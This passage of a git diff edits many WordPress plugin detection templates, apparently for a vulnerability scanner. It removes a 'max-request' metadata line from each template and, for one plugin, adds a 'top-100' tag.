@@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: - max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index c222bc9d4a..1ee0e67542 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: - max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index c8acf8c625..43cb2ab09c 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: - max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 66b7d6a363..7ba81036cf 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: - max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index a36016562d..24fc3e3295 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: - max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e4017b1a0a..e701e365ba 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: - max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 53d6d393bd..c0cc5400a8 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: - max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index c286e9a14f..22687bcffe 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: - max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 364e3cd71e..b69d3d5bfe 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: - max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 4fcccbfc33..7975a57702 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 3fbc714d3b..ff4cef94d7 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: - max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index c49b506979..a8903697b0 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: - max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index dfcaf6f71b..3f141c4476 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: - max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 61be246fee..5355e988a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: - max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 1c16a72d76..6f06b49011 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: - max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 50d2e6630b..53d409fb68 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 8d71f7bde9..0e908a9580 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: - max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 5e1f97086e..aeb1875c57 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: - max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index d87d456a8c..7c15702305 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: - max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index aa9153241e..5ce87e6c71 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: - max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 09641796a3..c342e6b45a 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: - max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 28b70d09bf..e95041f555 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: - max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index b43c10ed7a..879a0d1c12 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: - max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index eb7e78bc7f..985f5d373a 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: - max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 8881e23860..8e1cb46cf0 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: - max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7a58c58f63..7e3e4e2d7e 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: - max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 5f99b8cac8..17ea142c46 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: - max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index b08876df04..953e4ab3d8 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: - max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 3f68dffe06..92107fa69c 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: - max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 34f9bde1d6..5e1fe4ef5c 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: - max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d9f645328f..74fb3e6010 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: - max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 8a1196fc9f..b9f70ba555 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: - max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 05025452b7..6486c02c9a 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: - max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 0bc823830f..c45ef4bf89 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: - max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index dafe6974f6..3743307dbc 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: - max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index ba05fb1e16..a4c6980041 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: - max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/photo-gallery.yaml b/http/technologies/wordpress/plugins/photo-gallery.yaml index 7fbeea5917..a224d85727 100644 --- a/http/technologies/wordpress/plugins/photo-gallery.yaml +++ b/http/technologies/wordpress/plugins/photo-gallery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/photo-gallery/ metadata: - max-request: 1 plugin_namespace: photo-gallery wpscan: https://wpscan.com/plugin/photo-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 7f98d822a8..adf3387ddb 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: - max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 89602f4264..eb6e1aaa5d 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: - max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index 2f6513ca42..b3c83cd0bf 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: - max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 982306b13c..96d8bd6aca 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: - max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index fdcac13b56..85955ac95e 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: - max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 829edad042..a81fc892ca 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,10 +7,9 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: - max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 975b63f5de..d9c6052cd7 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: - max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 5065659e82..afc1141e0c 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: - max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 732ffbc4eb..d44add9ca6 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: - max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 12dffeb534..20ba5c2e16 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: - max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index ae0e76c4bb..cbcf3cf09d 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: - max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index b1718d1ccb..3311d42c94 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: - max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 7543ac1d55..46c1c22805 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4a29cecdb0..7c13b8d2a4 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: - max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index be281d91e6..53b30ba721 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: - max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 6bd95ec077..9555d7aebd 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: - max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 1fd64a5279..180266f448 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: - max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 648ee176ce..656ad7dfe5 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: - max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7836d9554c..015fb97043 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: - max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index ccd72e427a..1d5224b457 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: - max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3622b2c6b3..aafd6c6a38 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: - max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 9eff765d61..e10ab985da 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: - max-request: 